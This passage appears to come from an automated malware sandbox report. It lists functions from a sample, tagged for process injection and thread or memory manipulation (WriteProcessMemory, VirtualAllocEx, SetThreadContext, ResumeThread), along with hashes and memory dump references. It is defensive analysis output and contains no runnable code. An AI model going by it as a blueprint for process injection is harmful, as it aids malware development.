                                                                      • Instruction Fuzzy Hash: 5741F3B0C0071DCBEF24CFAAC84479EBBB5BF89304F25816AD508AB255D7B16945CFA0
                                                                      Function 06DD3FDB Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 568 6dd3fdb-6dd402e 571 6dd403e-6dd407d WriteProcessMemory 568->571 572 6dd4030-6dd403c 568->572 574 6dd407f-6dd4085 571->574 575 6dd4086-6dd40b6 571->575 572->571 574->575
                                                                      APIs
                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06DD4070
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6dd0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessWrite
                                                                      • String ID:
                                                                      • API String ID: 3559483778-0
                                                                      • Opcode ID: 69a6953e3933da11c988cc90242028e4ec606c16c948fe336d028dacb365aec4
                                                                      • Instruction ID: ff92c74b2d05db1f3b72fe21ced7d2977c1141495eebabf9e5add40b983b72f0
                                                                      • Opcode Fuzzy Hash: 69a6953e3933da11c988cc90242028e4ec606c16c948fe336d028dacb365aec4
                                                                      • Instruction Fuzzy Hash: 91213371900349DFDB10DFAAC881BEEBBF5FF88310F10842AE918A7240C7789944CBA4
                                                                      Function 06DD3FE0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06DD4070
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6dd0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessWrite
                                                                      • String ID:
                                                                      • API String ID: 3559483778-0
                                                                      • Opcode ID: 4b728671eefb0c25354a81197549b3fe97283ed85ce985019e2c37a50cf6d41f
                                                                      • Instruction ID: c1e36d93113e5a64fe7df51a44c9d2af9ad5461cdeb0f9f310218e9d70b82e60
                                                                      • Opcode Fuzzy Hash: 4b728671eefb0c25354a81197549b3fe97283ed85ce985019e2c37a50cf6d41f
                                                                      • Instruction Fuzzy Hash: 7D2122719003499FDB10DFAAC885BEEBBF5FF88350F10842AE918A7240C7799944CBA5
                                                                      Function 06DD40C8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06DD4150
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6dd0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessRead
                                                                      • String ID:
                                                                      • API String ID: 1726664587-0
                                                                      • Opcode ID: 9b287e209fc9f9ef00e822c53ca203eb95dcc0b0b2524892f2c9ad6c836e9828
                                                                      • Instruction ID: 1af403a4044089948270eefe2359a8ee0076bd86efb6385c8f3bb83f98d75164
                                                                      • Opcode Fuzzy Hash: 9b287e209fc9f9ef00e822c53ca203eb95dcc0b0b2524892f2c9ad6c836e9828
                                                                      • Instruction Fuzzy Hash: 18211671D00349DFDB10DFAAC881ADEBBF5FF88310F14842AE958A7250C7399914DBA5
                                                                      Function 06DD3E43 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06DD3EC6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6dd0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: ContextThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 983334009-0
                                                                      • Opcode ID: 8ed7947a7ea9c0d67812ada51a16e3281a23139d029f38191cabaab9d78d9b16
                                                                      • Instruction ID: 909a330ef7f6f16c247190b2286472ead044e994c590b50d87649914e65c8c73
                                                                      • Opcode Fuzzy Hash: 8ed7947a7ea9c0d67812ada51a16e3281a23139d029f38191cabaab9d78d9b16
                                                                      • Instruction Fuzzy Hash: 19213571D003098FEB10DFAAC8857EEBBF4EF89310F15842AD419A7280CB789945CFA5
                                                                      Function 06DD3E48 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06DD3EC6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6dd0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: ContextThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 983334009-0
                                                                      • Opcode ID: 9198a2ba4d06ab722cb30bb970146dd33b412f27f5a700d001e11dab80623e27
                                                                      • Instruction ID: 3fd68ba53a3deba3e7d22d9243f8cd969079236494ec350df7d115c91e46142e
                                                                      • Opcode Fuzzy Hash: 9198a2ba4d06ab722cb30bb970146dd33b412f27f5a700d001e11dab80623e27
                                                                      • Instruction Fuzzy Hash: F7214971D003099FDB10DFAAC4857EEBBF4EF89310F148429D519A7240C7789944CFA5
                                                                      Function 06DD40D0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06DD4150
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6dd0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessRead
                                                                      • String ID:
                                                                      • API String ID: 1726664587-0
                                                                      • Opcode ID: 92723fd32011be36fdc2e68b223a7eaf2425ef036169d87113c53bca83be4611
                                                                      • Instruction ID: 17ef062fe5e4d47031c7bf6430f207bd1ab063a166d496076c9bd8f19fa2d796
                                                                      • Opcode Fuzzy Hash: 92723fd32011be36fdc2e68b223a7eaf2425ef036169d87113c53bca83be4611
                                                                      • Instruction Fuzzy Hash: 3B21F571C003499FDB10DFAAC881AEEFBF5FF88320F14842AE519A7250C7799954DBA5
                                                                      Function 00DFD720 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00DFD7A7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2385332930.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_df0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: 8fd91ae6084897ff6aa2a8306535fee928ee7082e91668458aa8e7e3ea53688f
                                                                      • Instruction ID: a943450586ef45c062bd108ff87f1eb6a77fabdf95918bcad60c99b94d5b9f10
                                                                      • Opcode Fuzzy Hash: 8fd91ae6084897ff6aa2a8306535fee928ee7082e91668458aa8e7e3ea53688f
                                                                      • Instruction Fuzzy Hash: D121F5B5900249DFDB10DFAAD984ADEFBF9FB48310F14801AE918A7350C378A954CF65
                                                                      Function 00DFD719 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00DFD7A7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2385332930.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_df0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: d75e5b311f71a5444b9c2d590ec1f1fc84c39d7db36a67450910d3c56ef37466
                                                                      • Instruction ID: b4b3c17858eb7f99ef999634efd3ee7a25f4a52ff946cf76b4cdba3192d41924
                                                                      • Opcode Fuzzy Hash: d75e5b311f71a5444b9c2d590ec1f1fc84c39d7db36a67450910d3c56ef37466
                                                                      • Instruction Fuzzy Hash: 4321E2B5900209DFDB10CFA9D580AEEBBF5FB48310F14801AE918A7350C378A954CF65
                                                                      Function 06DE7CB8 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06DE7D33
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: bb0a7545b1b293d221cd143c47477185caf4fe7e84d7a3b412431303d0193307
                                                                      • Instruction ID: b8834b3014d60a5f1f133a68f5d15245d1891a77b1cc0143b0ac7ad3515c03fe
                                                                      • Opcode Fuzzy Hash: bb0a7545b1b293d221cd143c47477185caf4fe7e84d7a3b412431303d0193307
                                                                      • Instruction Fuzzy Hash: A72106B5900249DFDB50DF9AC884BDEFBF4FB48320F108429E958A7250D378A945CFA5
                                                                      Function 06DD3F1B Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06DD3F8E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6dd0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: 4e0cc72d602f1cc1bd04bd17b20ed6b8cd89634c018fd66d1ffb9b8c60d77b81
                                                                      • Instruction ID: 3f679cf57e94e7a62fff0712efe564d99652e1c83d9f52abc1a69a4e8b8d2886
                                                                      • Opcode Fuzzy Hash: 4e0cc72d602f1cc1bd04bd17b20ed6b8cd89634c018fd66d1ffb9b8c60d77b81
                                                                      • Instruction Fuzzy Hash: 5C1133718003499FDB20DFAAC845BDFBBF5AF88324F24881AE955A7250C7359954CBA1
                                                                      Function 06DE7CC0 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06DE7D33
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: 38af1ff3e675cbea10b3e9082fe62208a8f42a2be1f3b4fb71d81d1af14f934f
                                                                      • Instruction ID: ff6556b6494c8d3766974c659db096fcd9eec4d46c26fd7816263f2d1a528dd8
                                                                      • Opcode Fuzzy Hash: 38af1ff3e675cbea10b3e9082fe62208a8f42a2be1f3b4fb71d81d1af14f934f
                                                                      • Instruction Fuzzy Hash: F82114B5900249DFDB50DF9AC884BDEFBF4FB88320F108429E958A7250D378A944CFA5
                                                                      Function 06DD3F20 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06DD3F8E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6dd0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: 6262d7b517001186801628ed4dec696a7052ad3e7aaeb1c7d309478bba6e1f49
                                                                      • Instruction ID: beb696bf346ea02d6006850c0cd816089a0ef52fd7fef8cd17082bda3d728bc4
                                                                      • Opcode Fuzzy Hash: 6262d7b517001186801628ed4dec696a7052ad3e7aaeb1c7d309478bba6e1f49
                                                                      • Instruction Fuzzy Hash: 751153718003499FDB10DFAAC845BDFBBF5EF88320F208819E519A7250C739A900CBA1
                                                                      Function 06DD3D93 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6dd0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: ResumeThread
                                                                      • String ID:
                                                                      • API String ID: 947044025-0
                                                                      • Opcode ID: 9ebd695b2d4e4a06d5a1e931c5859df0fc31e28c925d4939f9554a526c4b2494
                                                                      • Instruction ID: 32e62084772b4f579abc415e1b773c708389fbf343898d211c783887cff89502
                                                                      • Opcode Fuzzy Hash: 9ebd695b2d4e4a06d5a1e931c5859df0fc31e28c925d4939f9554a526c4b2494
                                                                      • Instruction Fuzzy Hash: 5E114371C002498FEB10DFAAC8457AFFBF5AF88220F24881AC419A7250C739A945CBA5
                                                                      Function 06DD6930 Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 06DD6995
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6dd0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost
                                                                      • String ID:
                                                                      • API String ID: 410705778-0
                                                                      • Opcode ID: 55253f3c7f6c11aafc03383407b36250d931f02771897d59a28a6eaefea34272
                                                                      • Instruction ID: 2f1bd24a7956b39cf21a17ba51c37facd00549e96514243df78cc83b8e3ea327
                                                                      • Opcode Fuzzy Hash: 55253f3c7f6c11aafc03383407b36250d931f02771897d59a28a6eaefea34272
                                                                      • Instruction Fuzzy Hash: C611E0B5800349DFDB20DF9AC845BDEFBF8EB48320F20841AE958A7210C375A944CFA5
                                                                      Function 06DD3D98 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6dd0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: ResumeThread
                                                                      • String ID:
                                                                      • API String ID: 947044025-0
                                                                      • Opcode ID: 607612c0c1738f9a610e5ac88b961f9b38dccb0f10030f4376b0d42ecd66ce71
                                                                      • Instruction ID: 1948550b59a6db0a581f58fc4062cf9d547d8aee07b8dca7886e5650d4cca936
                                                                      • Opcode Fuzzy Hash: 607612c0c1738f9a610e5ac88b961f9b38dccb0f10030f4376b0d42ecd66ce71
                                                                      • Instruction Fuzzy Hash: EC116671C003498FDB10DFAAC84579FFBF5AF88320F208419C519A7240CB39A904CFA5
                                                                      Function 06DD41BC Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 06DD6995
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6dd0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost
                                                                      • String ID:
                                                                      • API String ID: 410705778-0
                                                                      • Opcode ID: 38e364e93334553556a7250fa1019676680aa0c570f219446d7aebd6353f86eb
                                                                      • Instruction ID: ed9e8c6cdc94cdb7b4457830880d2fd45e441cee24e17953667fe2d5840a6e60
                                                                      • Opcode Fuzzy Hash: 38e364e93334553556a7250fa1019676680aa0c570f219446d7aebd6353f86eb
                                                                      • Instruction Fuzzy Hash: D911FEB5800349DFDB60DF9AC985BDEBBF8EB48724F10841AE958A7210C375A944CFA5
                                                                      Function 00DFB038 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 00DFB09E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2385332930.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_df0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID:
                                                                      • API String ID: 4139908857-0
                                                                      • Opcode ID: 4fe17ae15de778eba92295328be8dbd06bfe595fd20c69c352f86a1c21dcb01a
                                                                      • Instruction ID: f7c5c0f03a393aeca25fb72fe961bf57aed65d0732b6f8cdf0fa74786b019af1
                                                                      • Opcode Fuzzy Hash: 4fe17ae15de778eba92295328be8dbd06bfe595fd20c69c352f86a1c21dcb01a
                                                                      • Instruction Fuzzy Hash: E7110FB5C006498FDB10DF9AC444B9FFBF4AB88324F15C41AD928A7210D379A545CFA5
                                                                      Function 00D1D3D8 Relevance: .1, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2384840897.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d1d000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2465b3248dd8b97068d0dedf0ca1fc6dc3a0ee91364c7b70f882f10f54fc909a
                                                                      • Instruction ID: 2f33b03712bf17ccb6614e247625158c61a2579ee5a2df36257f0b3b13f3849c
                                                                      • Opcode Fuzzy Hash: 2465b3248dd8b97068d0dedf0ca1fc6dc3a0ee91364c7b70f882f10f54fc909a
                                                                      • Instruction Fuzzy Hash: 30210671504204EFDB04DF14E9C0B56BB66FB98314F24C569E9090B256C736E896CAB2
                                                                      Function 00D2D1D4 Relevance: .1, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2384910167.0000000000D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D2D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d2d000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2a52b2604bbbbbf1d88ef40944a892ef3e31416d185e6ea55ea0af09d3de0455
                                                                      • Instruction ID: 2ea5462d3444aa77bfdb7971dd8e95e9f1c68731a12f8d7a2fd57af5cbd6d3d0
                                                                      • Opcode Fuzzy Hash: 2a52b2604bbbbbf1d88ef40944a892ef3e31416d185e6ea55ea0af09d3de0455
                                                                      • Instruction Fuzzy Hash: 9A21F271604204EFDB05DF24E9C0B26BBA6FF94318F34C5ADE9494B292C336D846CA75
                                                                      Function 00D2D01C Relevance: .1, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2384910167.0000000000D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D2D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d2d000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 30e71433c325c9ffb6780869ace5b9ab621288f154f509affe8041ccd0c636a4
                                                                      • Instruction ID: 1aad0fb6a79355eed42c85a3b9d4b2c8b9198d72452e1f0981e08184903c43c9
                                                                      • Opcode Fuzzy Hash: 30e71433c325c9ffb6780869ace5b9ab621288f154f509affe8041ccd0c636a4
                                                                      • Instruction Fuzzy Hash: 9321F571604244EFDB14DF24E6C0B16BB66FB94318F24C56DD9494B2A6C336D847CA71
                                                                      Function 00D2D005 Relevance: .1, Instructions: 62COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2384910167.0000000000D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D2D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d2d000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1d6df7c8488dc5ebb6a45168ef1d93bad280c92c2fe099797bede53048d9dc56
                                                                      • Instruction ID: e270001d03cf3e81bbfcee2aeebca7d5b91509999c4b4757ef56f1db9ab9f806
                                                                      • Opcode Fuzzy Hash: 1d6df7c8488dc5ebb6a45168ef1d93bad280c92c2fe099797bede53048d9dc56
                                                                      • Instruction Fuzzy Hash: FE2192755093C09FCB12CF24D990715BF72EB46314F28C5EAD8498F2A7C33A980ACB62
                                                                      Function 00D1D3D3 Relevance: .1, Instructions: 56COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2384840897.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d1d000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                                                      • Instruction ID: 3dac4801e846013de6f13bf529bf0cf7d33c0f00682d5b2b9cee970f94edce7d
                                                                      • Opcode Fuzzy Hash: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                                                      • Instruction Fuzzy Hash: D011E676504240EFCB15CF10D5C4B56BF72FB94324F28C6A9D8090B657C33AE85ACBA2
                                                                      Function 00D2D1CF Relevance: .1, Instructions: 53COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2384910167.0000000000D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D2D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d2d000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
                                                                      • Instruction ID: 850f96f8a0e576b3b71cb4174c537d8791acf35ee78f92f31dcd811f8cdb47f7
                                                                      • Opcode Fuzzy Hash: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
                                                                      • Instruction Fuzzy Hash: 10118B75904284DFDB15CF10D5C4B15FBA2FF94318F28C6A9D8494B696C33AD84ACB62

                                                                      Non-executed Functions

                                                                      Function 06DEA570 Relevance: 1.6, Strings: 1, Instructions: 325COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: {#L
                                                                      • API String ID: 0-1361971085
                                                                      • Opcode ID: 0aa3ee0e4a51cd193a2b8a4b4b0690ea3ce33832e895be56c4d69af02630c8f3
                                                                      • Instruction ID: e284d57a0de0251a1584ee3b021187d1221de816a9f8d755ef9a4c6a044a2654
                                                                      • Opcode Fuzzy Hash: 0aa3ee0e4a51cd193a2b8a4b4b0690ea3ce33832e895be56c4d69af02630c8f3
                                                                      • Instruction Fuzzy Hash: 46D13675E05219CFDB58CFAAD98059EFBF2BF89300F18D52AD419AB228D7309942CF50
                                                                      Function 06DEA560 Relevance: 1.6, Strings: 1, Instructions: 325COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: {#L
                                                                      • API String ID: 0-1361971085
                                                                      • Opcode ID: 8b125a9943db0768d33e71c6b89190752932585808686a8e1b6b2709ac9adc31
                                                                      • Instruction ID: 38dec3ce837696c638d9af8435fd48f5ccc38bea270eae1a937da4da0d096187
                                                                      • Opcode Fuzzy Hash: 8b125a9943db0768d33e71c6b89190752932585808686a8e1b6b2709ac9adc31
                                                                      • Instruction Fuzzy Hash: D6D13775E05219DFDB58CFAAD98059EFBF2BF89300F18D42AD419AB224D7349942CF50
                                                                      Function 06DE18D9 Relevance: 1.4, Strings: 1, Instructions: 175COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 98R
                                                                      • API String ID: 0-576591972
                                                                      • Opcode ID: 9d0c60f3c7266812acece9d899eb2a1ad7b7f5e8a004a3444d220ab2ca402eba
                                                                      • Instruction ID: e8fa97a19600031de62793d9d360427c8086ab357d33016489763f0cf1d44fda
                                                                      • Opcode Fuzzy Hash: 9d0c60f3c7266812acece9d899eb2a1ad7b7f5e8a004a3444d220ab2ca402eba
                                                                      • Instruction Fuzzy Hash: 557126B5E0420ADFDB44DF99D8819AEFBB1FB89310F148529D465AB314D334AA42CF94
                                                                      Function 06DE8698 Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: iUfo
                                                                      • API String ID: 0-3820436262
                                                                      • Opcode ID: 016654cdbd158a5c622df8bc3a9714217e1501ffddd738c6ac17dbb96bef2e68
                                                                      • Instruction ID: 59258c32c562b86b5ef87be5b5fc194e039507dfe74ca96e84706e566ed2d744
                                                                      • Opcode Fuzzy Hash: 016654cdbd158a5c622df8bc3a9714217e1501ffddd738c6ac17dbb96bef2e68
                                                                      • Instruction Fuzzy Hash: 5A51D0B8E052199FDB48DFA9D9856AEFBF2FF88301F10902AD405B7254E7389941CB94
                                                                      Function 06DE8688 Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
